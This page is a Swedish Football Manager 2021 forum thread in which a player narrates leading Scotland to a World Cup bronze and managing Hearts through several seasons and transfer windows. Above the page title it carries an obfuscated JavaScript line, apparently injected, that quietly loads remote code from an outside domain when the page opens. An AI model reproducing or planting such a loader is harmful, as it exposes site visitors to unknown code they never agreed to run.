;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM21] – O Flower of Scotland – Sida 2 – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[FM21] - O Flower of Scotland

32 Inlägg
3 Users
48 Likes
1,411 Visningar
(@classisco)
Eminent Member
Blev medlem: 3 år sedan
Inlägg: 30
Topic starter  

. .

♪ But we can still rise now, and be that nation again 

Pinsamt uttåg ur kvalet till Europamästerskapet tvingade fram en generationsväxling. Våra kreativa spelare som vi förlitat oss så mycket på började bli för gamla. Gamla stjärnor som McGregor, Armstrong, Ritchie och Fraser skulle nu fasas ut mot de unga krafterna. McTominay och Gilmour är redan etablerade spelare på de största scenerna. Där har vi en stark duo på det centrala mittfältet. Ytterbackarna Robertson och Tierney likaså. Mitt Heartslag har en rad spännande unga skottar som nu ska börja fasas in i landslaget. Innan VM-kvalet ska starta så ska Nations League klaras av. Schweiz, Italien och Spanien.


Nations League Grupp A 2024

Ett ungt landslags första match skulle bli Spanien hemma, efter frejdig offensiv från båda sidor så tar vi med oss ett poäng. Ett klart styrkebesked inför matchen borta mot Schweiz. Tyvärr blir vi rätt utspelade och förlorat rättvist med 0-2. Kanske skulle det här bli tuffare än vi trott. Kanske skulle det här bli början på slutet för min karriär i landslaget. 

Bättre vart det inte i nästa samling där vi tappar en 1-2 ledning med en man mer till 3-2 mot Italien. Hemma mot Schweiz tar vi bara en poäng och står därmed på 2 poäng efter 4 matcher. Delat sist med Spanien som också startat trögt. Kanske ett kvitto på att vår första poäng mot Spanien inte var så stark som först trott. Nästa match var Spanien hemma och den skulle bli livsviktig. En vinst skulle säkra vidare spel i a-gruppen då vi vinner inbördes mot Spanien. Men att besegra Spanien borta är inte det lättaste. Men efter en heroisk insats defensivt och ett 8,7 betyg på målvakten Harry Hannah var 0-1 segern ett faktum. Skönt med säkrat kontrakt inför sista hemmamatchen mot Italien. Där kryssar vi 1-1 och Bastoni tar sitt andra röda kort mot oss på två matcher.

Sex poäng på lika många matcher får betecknas som godkänt efter förutsättningarna. Vi fick en relativt enkel grupp men samtidigt så befinner vi oss i en generationsväxling. Nu väntar kvalspel till VM med Belgien, Bosnien, Israel, Armenien och Gibraltar. Där krävs gruppvinst eller att vara en av de sex bästa tvåorna.

Spoiler
Nations League matcher
. .

. .


VM-kval 2025

Vi skulle få bekänna färg direkt i kvalet. Seed #3 Bosnien inledde mot oss i Sarajevo. En typisk match som mitt ideala landslag bara städar av. Trots 0-2 ledning i halvtid så får vi bara med oss ett poäng. Orutin från både spelarna och min sida. Israel hemma var inga större problem. Efter kraftigt spelövertag vinner vi med 2-0 och lämnar första samlingen med fyra poäng. Återigen balanserar vi på gränsen mellan godkänt och icke godkänt. Nu väntade Armenien och Belgien borta i nästa samling.

Borta i Armenien så har vi lärt oss från våra misstag i Bosnien. Ett tidigt ledningsmål blir signalen för oss att dra ner på tempot och försöka spela av matchen. Så gör vi också och tar en bekväm 0-1 seger och sparar samtidigt lite energi inför Belgien. Där väljer jag att gå med en mer rutinerad elva. Spelmässigt är vi med, men Belgien har för mycket kvalité och vinner med 2-0 efter en ganska jämn tillställning. Lukaku är för bra för vår backlinje och andraplatsen känns som det mer rimliga målet nu.

Nu väntar en höst med gynnsamt spelschema. Gibraltar (H) och (A) samt Bosnien, Armenien (H) och Israel borta. Sist av allt var Belgien hemma på Hampden Park. Gibraltar hemma blir inga problem för vår andraelva. Därmed kommer en utvilad förstaelva att möta Bosnien. Enkelt blir det även där och vi lämnar samlingen med 7-0 och 4-0 segrar. Kunde vi fortsätta städa av de "enkla" motståndarna fanns nog en av de där bästa andraplatserna inom räckhåll. Gruppsegern är också tekniskt sett inom räckhåll då Belgien tappar poäng hemma mot Israel i match 6.

Israel 2-0 och Armenien 6-2 blir inga problem i samling 4 och VM-platsen känns hotande nära. Kan vi bara vinna mot Gibraltar och kanske ta en poäng mot Belgien BORDE vi gå vidare. Gibraltar städas av enkelt samtidigt som Belgien kryssar i Bosnien. Helt plötsligt står vi på andraplats, en poäng bakom Belgien inför sista matchen. Mot just Belgien på hemmaplan.

Det är ett sjukt taggat skotsk lag som faktiskt kör över Belgien i inledningen. Den nyligen petade McBurnie nickar in 1-0 efter 17 minuter. McBurnie som bara spelar på grund av skada på ordinarie forwarden Henderson. Gasen stannar i botten och Belgien plågas av oss i 90 minuter. När slutsignalen går har vi både vunnit gruppen och matchen. 3-1 slutar det och resultatet är i underkant. Vi når osannolika 4,04 i xG, siffror som bara brukar nås mot blåbärsnationer. Inte lag som vinner Europamästerskap. Det ska dock sägas att sen Belgien vann EM 2020 (nåja 2021) så har man haft det jobbigt. Uttåg i 8-del i VM samt poänglösa i gruppspelet i EM. Men ändå en sjukt stark bedrift från vår sida. Nu åker vi till Nordamerika för att gräva guld i USA och tillrättalägga fiaskot i Qatar 2022 och i kvalspelet sist!

.

. .


Truppen och taktiken med 7 månader till VM

. .


   
raca14 reacted
SvaraCitera
(@classisco)
Eminent Member
Blev medlem: 3 år sedan
Inlägg: 30
Topic starter  

. .

Säsongen 2025/26

För vår del var det bara serieseger som gällde i år. Vi vann förra årets serie tämligen enkelt och vi var ett bättre lag i år. Serien börjar också planenligt och vi tar seger efter seger. Några plumpar kommer såklart men överlag är vi ligans bästa lag. Bortsett från 0-3 hemma mot Celtic håller vi en jämn hög nivå under hösten. Samtidigt som vi kombinerar det med gruppspel i Champions. Alla våra poängtapp under augusti-november kommer följaktligen direkt före eller efter en gruppspelsmatch. Vi hinner med en chockförlust hemma mot Aberdeen med 3-4 innan vi tar vinteruppehåll. Celtic har vi, trots 0-3 hemma, skakat av oss för länge sedan. Rangers däremot hänger kvar och nosar några poäng bakom oss.

Vår resa i Betfred Cup blev längre än jag förväntat. En reservelva, med betoning på reserv, fick sköta matcherna där och dom gör det med den äran. Hamilton, Kilmarnock och Aberdeen besegras innan vi når finalen. I finalen väljer jag ändå att spela en starkare elva och det får jag betala för. Matchen spelas 3 dagar innan sista gruppspelsmatchen i CL och matchen går till straffar. Där triumferar Rangers.

Spoiler
Inhemska matcher hösten 2025
. .

. .

På vårsäsongen handlade det egentligen bara om att bibehålla formen. Matchandet skulle inte bli lika tätt och speltiden skulle därmed minska för en del. I det första kvartalets ligamatcher tappar vi bara två poäng och säkrar i och med det en plats till CL nästa år. 32 matcher är spelade och vi leder med sex poäng. Då ska vi först möta Rangers borta innan mästerskapsserien drar igång. Rangers är också det laget som skuggar oss i tabellen. En förlust här och vi ligger bara tre poäng före. 

Förlust blir det också och vi äntrar mästerskapsserien med tre poängs försprång, tre och en halv poäng kan man säga då vår målskillnad är mycket bättre. Efter vinst mot Hamilton så förlorar vi med hela 0-3 hemma mot Aberdeen i en match vi bara måste vinna. Helt lika i tabellen alltså inför omgång 36 där Rangers väntade på bortaplan. Och om inte det var nog skulle vi möta Hibs borta och slutligen Celtic borta! Det blir förlust mot Rangers och det känns som att ligatiteln håller på att glida oss ur händerna. Tre poäng efter med två matcher kvar. 

Vi vinner mot Hibs borta samtidigt som Rangers tappar poäng, det hjälper oss föga då vi fortfarande är ett poäng efter inför sista omgången. Rangers hade Hamilton borta, ett lag som låg sist i mästerskapsserien och med mycket tur kunde knipa en europaplats. Vi å andra sidan skulle möta mäktiga Celtic borta. Man kan tycka att Celtic borde lägga sig för att förvägra Rangers en titel. Men så var inte fallet, ett furiöst kämpande Celtic bombarderade vårt mål tidigt i matchen men Hannah i mål håller dom stången. 0-0 i paus.

    Andra halvlek. I minut 47 plingar det till i telefonen hos assisterande. Mål borta i Hamilton, nervöst kollar vi och ser att Hamilton tagit ledningen. Det betyder att vi går upp i serieledning på bättre målskillnad. Nu gällde det bara att hålla Celtic stången. Samtidigt kunde vi inte bli allt för försiktiga då ett Rangersmål skulle betyda andraplats igen. Spänningen utbytts i eufori då inbytte landslagsmannen Mushica ger oss ledningen i minut 69. Direkt svarar Celtic och gör 1-1. Den spända stämningen var tillbaka och vi väntade bara på besked om en slutsignal i Hamilton. I minut 80 får vi det dystra beskedet. Rangers har kvitterat och återtagit serieledningen. Vi skickar allt framåt i ett desperat försök att återta ledningen. När allt ser som mörkast ut i minut 95 så händer det. En skarv från Louis Murdoch friställer målskytten Mushica som kyligt dinkar in bollen över Celticmålvaktens högra ben. 1-2 i minut 95 och seriesegern var säkrad!

. .

Spoiler
Inhemska matcher vårsäsong
. .


Europaspel 2025/26

För andra gången skulle vi gå in i gruppspelet i Champions League. Förra gången vann vi oväntat gruppen innan vi fick respass i åttondel. Nu skulle vi möta Chelsea, PSV och Juventus. Den kanske svåraste matchen inledde. Vi vet sen tidigare europeiska matcher att det var på hemmaplan vi var starka. Där kan vi mäta oss mot de flesta. Borta var det bara att hoppas på enstaka poäng. Något poäng blev det dessvärre inte mot Chelsea. Däremot löser vi ett kryss borta mot PSV. En match som vi i efterhand kanske borde ha vunnit. Lag som PSV bör man knipa sex poäng av om man vill gå vidare. Men 1 poäng på två bortamatcher får ses som godkänt.

Ett dubbelmöte mot Juventus väntade. Chelsea hade besegrat Juventus klart och gruppen börjar mer och mer utkristallisera sig. Chelsea är bäst, Juventus är näst bäst. Alltså blev dessa två matcher nyckeln i om vi skulle avancera eller ej. Hemma så startar Juve bäst men vi vänder framför våra fans och vinner hemmamötet med 2-1. I Turin är det återigen Juve som startar bäst, denna gång har man 2-0 in i paus. Vi börjar återigen en vändning, men här tar den stopp och Juve vinner 3-1. Lite jobbigt med det sista målet då Juve har ett övertag på oss nu i inbördes möten.

Med fyra poäng på lika många matcher skulle de två sista matcherna bli avgörande. Vi kunde faktiskt sluta på samtliga positioner i gruppen. Lyckligtvis var båda matcherna hemma, oturligt nog var den första mot Chelsea. På annat ställe i Europa så går vår tabellkollega PSV, som också stod på fyra poäng, och vinner mot Juve. Det innebär att en tredjeplats är i fara men även att vi kan säkra avancemang. Vi kniper dock en pinne mot Chelsea och tabellen ser ut som följande inför sista omgången: Chelsea 10, PSV 7, Juventus 6, Hearts 5. Vi skulle dock möta PSV hemma, en match som jag kände mig optimistisk inför. Förhoppningsvis kunde Chelsea ta poäng från Juventus borta. Då skulle vi gå vidare. 

I halvlek ser det nattsvart ut, vi ligger under med 0-1 och Juve leder med 1-0. Alltså: Chelsea 10, PSV 10, Juve 9, Hearts 5. Vi lyckas dock efter en kastad vattenflaska att vända matchen och passera PSV både på resultattavlan och i tabellen. Juventus håller dock tyvärr undan och vi slutar trea i gruppen och får spela Europa League till vår.

. .

. .

EL-slutspel

EL kändes inte lika spännande detta år. Turneringen var fylld av starka lag som var bättre än oss. Titelchanserna kändes nästan obefintliga. Vi börjar dock med att städa av ett Krasnodar med många svenskar i. 6-1 totalt var så bekvämt som det låter. I 8-del börjar vi med att besegra Frankfurt med 3-0 hemma, men precis som förra året vid en 3-0 ledning så blir vi lite kaxiga och övermodiga. Borta i Tyskland så förlorar vi med 0-2 och får återigen lämna en åttondel med hjärtat i halsgropen.

Precis som ifjol så blir kvartsfinalen lite för svår för oss. Vi kryssar bara 1-1 hemma mot Valencia och har 1-1 borta i en lång stund. När Valencia sedan gör 2-1 efter timmen spelad så är saken klar. 3-1 fastställer och vi får ta nya tag nästa år. Det kändes aldrig riktigt som att vi var med, precis som ifjol kändes vi slutkörda efter en lång säsong. Det ska dock sägas att vi vinner båda matcherna knappt på xG.

. .

 

 


   
SvaraCitera
(@classisco)
Eminent Member
Blev medlem: 3 år sedan
Inlägg: 30
Topic starter  

. .

♪ O flower of Scotland, when will we see your like again? ♪

Det var ett formstarkt skotsk landslag som gick in i VM 2026. Förhoppningsvis hade lärdomar dragits av förra världsmästerskapets debacle. Nu var det ett nytt format i VM, 48 lag deltog i 16 olika grupper om 3. Vi hade lottats med Argentina och Uzbekistan. Med andra ord en drömlottning om avancemang var målet. Två lag gick nämligen vidare till en sextondelsfinal. Gruppseger var dock att föredra då vi skulle möta grupptvåan i Italien, Jamaica och Togo. En andraplats i gruppen skulle med allra största sannolikhet innebära Italien och ett uttåg direkt. Vi siktar högre än så.

Följande trupp reste över till Mexiko där vår grupp skulle spelas. Mästerskapets värdskap delas nämligen av tre länder; USA, Mexiko och Kanada.

. .


Match 1:??????? SCO-UZB ??

Den kanske enklaste VM-premiären man kunde be om. Väldigt tacksamt för oss då var ganska tempostarka fotboll hade en tendens att trötta ut vår trupp. Om vi hade premiärnerver så är dom borta efter 20 minuter av matchen då Oli McBurnie gör 2-0. I halvtid står det hela 6-0 till oss. McBurnie har hunnit göra två, likaså har Josh Adam. KT och Gilmour har hunnit med att göra varsitt. I andra halvlek går vi lite på sparlåga och Uzbekistan gör två mål. Josh Adam fullbordar sitt hattrick och fastställer slutresultatet till 7-2. En magisk start på detta VM. Nu väntade 8 dagars vila då Argentina skulle hinna möta Uzbekistan.

Match 2:??????? SCO-ARG ??

Argentina hade besegrat Uzbekistan med 5-1 och således hade vi övertaget här. Ett kryss skulle ge oss gruppsegern och Jamaica i 16-del. Förlust skulle ge oss Italien. Ganska mycket att spela för om du frågar mig. Lautaro Martinez hittar nätet efter 1 minut och vi hamnar direkt på bakfoten. Vår bäste spelare Billy Gilmour gör sedan ett enormt solomål där han driver boll från sidlinjen strax utanför eget straffområde hela vägen till offensiv box där han smäller in 1-1 i bortre kryss. Ett mål som är det snyggaste jag sett i denna save, by far. Men argentinarna smäller in två baljor innan paus och vi går in med 1-3 i baken. Kanske blir vi straffade för vår ganska naiva spelstil. Vi kan uppenbarligen inte gå tå mot tå mot de allra bästa. I andra måste vi anfalla och de ljusblå straffar oss big-time. 1-5 slutar matchen och vi ställs mot Italien.

. .


Sextondelsfinal:??????? SCO-ITA ??

Vi hade dragit ovärderlig lärdom från matchen mot Argentina. Det var därför ett väldigt defensivt lag som ställdes på benen mot Italien. Kieran Tierney kan tyvärr inte starta då han är sliten från sist. Unge Hester går in på högerbacken istället. Väldigt lite händer under öppningen men matchen får en stor vändning då Oddei i Italien saxar McTominay bakifrån och drar på sig i ett rött kort i slutet på första halvlek.

Vi snackar i paus om att öppna upp lite mer offensivt nu när vi är en man mer. Mentaliteten går från försiktig till kontrollera och bolltempot dras ner. Här skulle inget riskeras, vi skulle sakta men säkert bryta ner italienarna. Det skulle inte bli en Hawaii-match där slumpen avgjorde. Men runt timmen spelad så är domaren framme med det röda kortet igen. McTominay drar på sig två gula kort inom loppet av två minuter och matchen avslutas 10v10. Nu var det tillbaka till första halvlekens mentalitet. Vi har stora problem med de italienska omställningarna och flera gula kort delas ut. Nåväl så slutar matchen 0-0 efter 90 minuter.

Förlängningen blir en enda lång pina där Harry Hannah gör räddning efter räddning. Vi går på knäna och anfaller knappt. En långboll i minut 114 letar sig fram till inbytte Louis Murdoch. Murdoch som agerar inhoppare i mitt Hearts och som var man #23 i truppen. Louis Murdoch gör inga misstag utan rullar in 1-0 till oss i minut 114. Och om de första 24 minuterna av förlängningen kändes långa så är det inget mot vad de sista 6 kändes som. Tillslut blåser domaren av och vi har avancerat till åttondel!.

Spoiler
ITAvSCO
. .

Åttondelsfinal:??????? SCO-IRE ??

En mycket enklare motståndare i form av Irland väntade oss i åttondel. Irland hade just slagit ut Marocko på straffar. Så dom bör ha varit lika slut som vi var. Återigen så var Tierney slutkörd. Han hade fått 75 minuter i förra matchen då matchen gick till förlängning. Båda våra innermittar kapabla att spela i den bollvinnande rollen var avstängda. McTominay för sitt röda och McCrorie för ackumulerade varningar. Ner med offensiva mittfältaren Turnbull och ner med Gilmour som fick agera bollvinnare. De planerna fick snabbt ändras då Irland kontrar in 0-1 efter 9 minuter. Upp med Gilmour i banan för att skapa lägen. Vi går också tillbaka till vår ursprungstaktik med mer offensiv mentalitet. Det ger resultat direkt då matchvinnaren från sist, Murdoch kvitterar. 

I andra halvlek står matchen och väger lite, vi är det bättre laget men Irland är långt ifrån ofarliga. Chansmässigt är det ganska lika innan vi tilldöms en straff efter 70 minuter. Straffspecialisten och VM-debutaten Turnbull dundrar säkert in den mitt i mål. 2-1 med 20 minuter kvar, nu var det bara att hålla ut. Vi håller också ut och är klar för kvartsfinal i VM!

Spoiler
SCOvIRE
. .

Kvartsfinal:??????? SCO-CZE ??

Ännu en lätt lottning för oss, tjeckerna hade förvisso slagit ut både Sverige och Frankrike. Men båda matcherna gick till straffar. Nu väcktes faktiskt ett litet hopp om att detta kunde gå hela vägen. Åtminstone ett steg till. Den passiva mentaliteten som vi började förra matchen med kastades åt sidan. Den här matchen skulle vi dominera. Alla våra avstängda spelare var tillbaka, Tierney var relativt frisk. Värre var det med Gilmour som spelat varje minut hittills. Även matchhjälten Murdoch var lite sliten. Men just Gilmour och Murdoch har varit så viktiga för oss hittills. 

Vår optimism utbyttes snabbt i skräck då Tjeckien tar en snabb 2-0 ledning efter enbart 20 minuter. Nu var det bara att trycka gasen i botten, det fick bära eller brista. Skulle vi förlora stort går vi åtminstone ut med flaggan i topp(nåja). Snabbt har vi reducerat efter en frispark av Gilmour. Det har bara gått 26 minuter då Murdoch utjämnar med sitt tredje VM-mål på lika många matcher. Tjeckerna replikerar snabbt på hörna genom Soucek. 5 mål på endast 30 minuter. En galen start mellan två lag som var slutkörda. 

I andra halvlek går vi ännu mer offensivt. Vi går över på en sorts 4-2-4 uppställning med Gilmour som kreativ kraft i mitten. Tiden går och när endast en kvart återstår får vi återigen en straff. Utan Turnbull på planen så blir det Gilmour som steppar upp och gör sitt andra mål i matchen. Med ett psykologisk övertag och med alla byten gjorda så fortsatta vi att trycka på med vår offensiva 4-2-4 uppställning. Plötsligt i minut 88 letar ett inlägg med skarv sig fram till unge Murdoch som kyligt knoppar in 4-3 och nickar oss vidare till en historisk semifinal! Euforin visste inga gränser, men hela laget är fullkomligt slutkörda. Men vi är i semi!

Spoiler
CZEvSCO
. .

Semifinal:??????? SCO-NED ??

Från förra matchens elva saknades fem spelare. Alla på grund av samma skäl. De var helt slutkörda. Vår offensiva trio fick helt nytt blod. McBurnie-Murdoch-Adam var nu Mushica-Henderson-Bowie. Utöver det var McTominay och Tierney nere på knäna i sista 25 mot Tjeckien. Holland väntade nu, ett lag som vi vet att vi kan slå, men även ett lag som vi har förlorat mot. Oddsen kändes mot oss med läget i truppen rent konditionsmässigt. Stämningen var däremot på topp.

Tillbaka i en mer försiktig spelstil så tappar vi återigen in ett tidigt mål. Det verkar inte spela någon roll hur vi spelar, vi släpper ändå in tidiga mål. 0-1 i baken direkt var inte optimalt, gasen i botten igen. Holland har inne en boll men det döms bort för ruff. Armando Mushica löper sig ren och kvitterar för oss istället. Ner på den försiktiga mentaliteten igen. Men innan paus är olyckan framme igen. 1-2 i minut 45. Efter pausen kommer vi ut med syftet att använda våra sista krafter. Ett pressat inlägg från vikarierande högerbacken Hester tar flera studsar och letar sig in i nätet via De Ligt. 2-2 efter 49. Istället för backa hem igen så väljer vi att fortsätta pressa. Men efter 70 minuter tar det ut sin rätt. Hela vårt mittfält går på knäna och vi har inget val annat än att backa hem och slösa tid. Det ger oss en förlängning.

I förlängning för Depay ganska tidigt 2-3 och läget känns mörkt. Alla våra spelare kippar efter luft och en kvittering känns fjärran. Ändå gör vi ett försök och lyfter bollar på vår uppflyttade mittback Thompson. Vi lyckas skapa oreda och Gilmour träffar stolpen med ett skott på en bortnickad hörna. Närmare än så kommer vi inte, semifinalsförlust i förlängning svider något oerhört. Särskilt när det känns som att ett helt friskt Skottland hade tagit det här. Nya tag i bronsmatchen!

Spoiler
SCOvNED
. .

Bronsmatch:??????? SCO-BRA ??

Världsettan Brasilien stod för motståndet. Inte den enklaste motståndaren att möta med trötta spelare. Men nåväl, det här är kanske vår enda chans till en medalj i VM. När elvorna släpps så är det 8 ändringar i brassarnas lag. Kanske ett tecken på att dom inte tar det så jätteseriöst. Vi går in med en nästintill ordinarie elva. Alla spelare med dålig fitness tvingas spela, nu finns det inget att spara på. Vi återvänder till den försiktiga mentaliteten. Redan från minut en börjar vi maska.

Spelmässigt är det ändå jämnt. Båda lagen har ett gäng halvfarliga chanser men inget vidare. Fram tills minut 80. Brasilien kommer i ett friläge där Martinelli skjuter utanför. Jag hinner knappt sucka av lättnad innan vi är och anfaller på andra sidan. Ett inlägg letar sig mot Murdoch, precis som det gjorde i slutsekunderna mot Tjeckien. Den här gången nickar Murdoch rakt på målvakten och matchen går till förlängning. Förlängningen är tråkig och tafatt och straffar väntar. 

Ett oinspirerat Brasilien mot ett supernervöst Skottland. En världsmålvakt i Ederson mot en ung ojämn 21-åring i Hannah. Kapten Robertson kliver fram och smäller in straff nummer 1. Ederson går rätt och är nära, men straffen är för bra slagen. Rodrygo rullar retfullt in straffen och Hannah står fastfrusen i mitten. 1-1. Henderson lurar ner Ederson och slår in straffen i motsatt hörn. Fabinho kliver fram för brassarna och slår den åt höger, det läser Hannah och gör en monumental räddning. 2-1 och fördel oss. McCrorie lägger den åt samma håll, Ederson läser den men straffen är för bra slagen. Även brassarna gör mål. 3-2. Inbytte Kieran Bowie är kylig och rullar bollen mitt i mål där en hoppande Ederson stod sekunden innan. Men nu ligger han intill vänstra stolpen och ser oss ta en 4-2 ledning. Martinelli gör mål och förvägrar Hannah hjälterollen. Men i omgång kliver Billy Gilmour fram till straffpunkten. Mannen som spelat varje minut i turneringen och som gått på knäna i flera av dessa minuter. Gilmour är säkerheten själv och vi har vunnit brons i VM.

Ett oerhört bra mästerskap som slutar med en osannolik medalj. Om sanningen ska fram så har vi en väldigt gynnsam lottning fram till semifinal med undantag för Italien. Men likväl så presterar vi lång över kapaciteten!

. .


   
SvaraCitera
Arne Hegerfors
(@arne-hegerfors)
Active Member
Blev medlem: 3 år sedan
Inlägg: 16
 

Fantastiskt resultat och en otroligt bra saverapport!


   
classisco reacted
SvaraCitera
(@classisco)
Eminent Member
Blev medlem: 3 år sedan
Inlägg: 30
Topic starter  

. .

Inför säsongen 2026/27

Efter förra säsongens jämna titelstrid så var vi åter tippade trea. Rangers har behållt i stort sett samma lag medan Celtic sålt spelare för över en miljard. Däribland mittbacken Thompson och högerbacken Hester. Båda 19-åriga supertalanger som jag försökt locka över till oss under lång tid. Men Spurs och Chelsea blir deras nya klubbadress och det blir nog bra ur utvecklingssynpunkt. Det ska också sägas att Celtic värvat för cirka 700 miljoner också, så deras trupp lär vara starkare i år.

Vi å andra sidan har gjort lite förändringar. Trotjänarna på högerkanten; Ralston och Chalmers lämnar för nya äventyr. Sammanlagt får vi ihop nästan 200 miljoner, fullt godkänt då dessa spelare får betecknas som överflödiga för oss. Ralston kommer dock stanna till årsskiftet. En ny högerback behövdes då Ralston lämnar. Vårt förstaval där, Chaine som fyller 20 skadade sig och var borta i fyra månader ifjol. Så förhoppningsvis kan nye Kenny Brindle, 19 hålla sig frisk detta år. Kapacitetsmässigt är han lika bra som Ralston, dock flera år yngre och får 37 miljoner kan man inte klaga. Chalmers behöver egentligen inte ersättas då alla våra spelare på det offensiva mittfältet behärskar alla tre positioner. In kommer dock Mochrie, 23 från Chelsea. En ung skotsk spelare som blev tillgänglig för endast 4 miljoner. Han kommer från flera år utan seniorfotboll så förhoppningsvis finns det en utvecklingspotential där. I nuläget är han bara en rotationsspelare.

Den största värvningen av dom alla är av 18 årige bulgaren Boyan Stankov. Stankov spelar redan landslagsfotboll och är redan bäst i vårt lag. Tyvärr insisterade han på en utköpsklausul på endast 215 miljoner, en klausul som förmodligen kommer triggas inom 12 månader om inte nytt kontrakt skrivs. Hans intåg gör mittfältet trångt och bud haglar in på Badiashile och Molina. Våra två andra utländska unga talanger på innermitten. Inget bud som jag nappar på då summorna är alldeles för låga. Men på deadline-day så bestämmer sig unge Molina för att bråka sig bort. En summa på upp till 67,5 miljoner förhandlas fram med en 50% vidareförsäljningsklausul. Alldeles för lågt men förhoppningsvis får vi lite mer pengar tillbaka snart.

. .


Champions League

Vi går in i CL i tredje seedningsgruppen, ett hack upp från tidigare år. Det borde innebära enklare lottning men så är inte fallet i år. Vi lottas in i vad som måste betecknas som dödens grupp. Bayern München, Inter och Rennes. Ingen tydlig slagpåse som man kan hämta poäng ifrån och vi kommer få kämpa för varje poäng.

. .

. .

OBS. Malik Tillman har nu bott fem år i landet och väntar på dokumentation om eventuellt nationsbyte!


   
SvaraCitera
(@classisco)
Eminent Member
Blev medlem: 3 år sedan
Inlägg: 30
Topic starter  

. .

Säsongen 2026/27

Efter två raka ligatitlar så kändes inte ligatiteln lika attraktiv. Nu var det ute i Europa vi skulle skina. Vi hamnade för första gången i den tredje seedningsgruppen vilket betyder att vi skulle lottas med två bättre lag och ett sämre lag. Vi lottades mot Inter, Bayern och Rennes. Den kanske svåraste gruppen vi fått trots seedningen.

I ligan flöt vi som väntat på bra. Däremot var det tuffare i Europa. Rennes hemma var den första matchen, den enklaste matchen på förhand. En match vi bara måste vinna, en match som vi förlorar med 1-3. Vi är inte sämre än Rennes, men vi är heller inte bättre. Ett dåligt tecken. I match 2 vi åker vi till München och plockar hem 0-0. Kanske var den första matchen bara en olycka. Gruppledaren Inter väntade härnäst på bortaplan. Där blir det en knapp 1-2 förlust och vi avslutar den första omgången med endast 1 poäng. Ändå är det med lite optimism som vi går in i den andra rundan. Den optimismen försvinner då vi förlorar hemmamötet med Inter och därmed åker ur CL. Ytterligare värre blir det då vi torskar mot Rennes hemma och fastslår vår fjärdeplats. Det gör inget att vi gör en jättematch i omgång 6 och besegrar Bayern med 3-1. Vi slutar sist och får för första gången på länge en vår utan europaspel.

I ligan går vi urstarkt, serien är avgjord efter 32 omgångar och vi avslutar de sista 15 matcherna med 14 vinster och ett kryss. Även Skotska Cupen vinner vi utan större problem och fastslår vår status som Skottlands bästa klubb. Däremot börjar vår konkurrenskraft i Europa ifrågasättas. Har vi bara ridit på en framgångsväg eller var detta ett mellanår? Förhoppningsvis det andra.

. .

. .

Övergångar

Januarifönstret blev aktivt. Högerbacken Ralston lämnar som blev klart i augusti. Kapten Souttar lämnar också för Asien. Unge forwarden Angus Gay säljs till Marseille för kaffepengar plus vidareförsäljningsklausul och tillbakaköpsklausul. Han är talangfull och kommer bli bra men är för närvarande bakom två större talanger. Högerbacken Sanele Chaine lämnar också för en bråkdel av det han köptes för, tyvärr har skador gäckat honom och fått hans utveckling att stagnera. In kommer två unga uruguayaner. En bollvinnande mittfältare som vi betalar lite för mycket för. Han går inte in i elvan men kommer få spela många värdefulla minuter bakom McCrorie. Även offensive mitten/yttern Barreto hämtas in för stora summor. Han spås en lysande framtid och kommer nog växa ifrån oss snart.

. .

This post was modified 3 år sedan by classisco

   
raca14 reacted
SvaraCitera
(@classisco)
Eminent Member
Blev medlem: 3 år sedan
Inlägg: 30
Topic starter  

. .

Inför Säsongen 2027/28

En del rockader skulle ske, det visste vi om. Luis Uribe, en ung colombiansk mittback var påväg in. Påväg ut var en rad nyckelspelare. Hela vårt innermittfält med Tillman, Badiashile och Stankov ryktades starkt iväg. Stankov som är ligans överlägset bästa spelare sitter dessutom på en utköpsklausul på 215 miljoner.

IN: In kommer först det vi länge väntat på, en skotsk ung bollvinnare på mittfältet. Darren Low ansluter från Derby för 77,5 miljoner. Lite överpris men väl värt det för oss. Uribe den unge colombianske mittbacken ansluter för 11 miljoner. Utöver det så kommer högeryttern Gonzalo Plata in från Dynamo Kiev. Han gör sin sjunde europeiska högstaliga på sju säsonger i och med den här flytten. Han ansluter på free transfer och blir vår bäste ytter direkt. I övrigt sker inga fler värvningar, det kommer mer handla om att assimilera de värvningar vi gjort nu och i Januari.

UT: Lämnar oss gör en rad spelare. Malik Tillman, vår förste stjärnvärvning lämnar för 270 miljoner tillbaka till Tyskland. Josh Adam som vi lånat och tillslut värvat från Man City lämnar för West Ham. Endast för 152 miljoner men det kändes som att hans utveckling höll på att börja stagnera hos oss så det kändes rätt. I och med att Uribe anslutit så puttades 23 årige Callum Flatman ner till femte plats bland mittbackar. Han ska inte behöva spela reservlagsfotboll så han säljs vidare till Standard Liege för 49 miljoner. Vänsterbacken Matthew Anderson har också sett sig degraderad till reservlaget i och med unge Scott McCarthy fina utveckling. Anderson säljs till Hamilton för 10 miljoner. I övrigt säljs reservlagsforwarden Paul Grant till Bundesliga för 15 miljoner och några ströspelare lämnar för små summor.

Sammanfattning

I slutändan lyckas vi behålla Stankov vilket var prio 1. Dock vill han fortfarande inte förnya sitt kontrakt. Men i övrigt känns truppen starkare i år och bookmakers håller oss för första gången som favoriter i ligan. I CL lottas vi i en svår grupp igen. Lyckligtvis så får iallafall Dinamo Zagreb i gruppen förutom Atletico de Madrid och Bayern.

Spoiler
Övergångar
. .

. .

. .


   
SvaraCitera
(@classisco)
Eminent Member
Blev medlem: 3 år sedan
Inlägg: 30
Topic starter  

. .

Säsongen 2027/28

Efter en genomusel säsong ute i Europa så väntade en ny säsong. Uttåget ur Champions League fick inte upprepas. Var det ett tecken på att vår kurva var vikande eller var det bara en blipp. De inhemska titlarna kändes inte lika attraktiva då vi vunnit alla ett par gånger. Truppen känns dock starkare än någonsin men dock inte riktigt samspelta än. Trots att Celtic rustat inför denna säsong så var vi favoriter enligt spelbolagen för första gången.

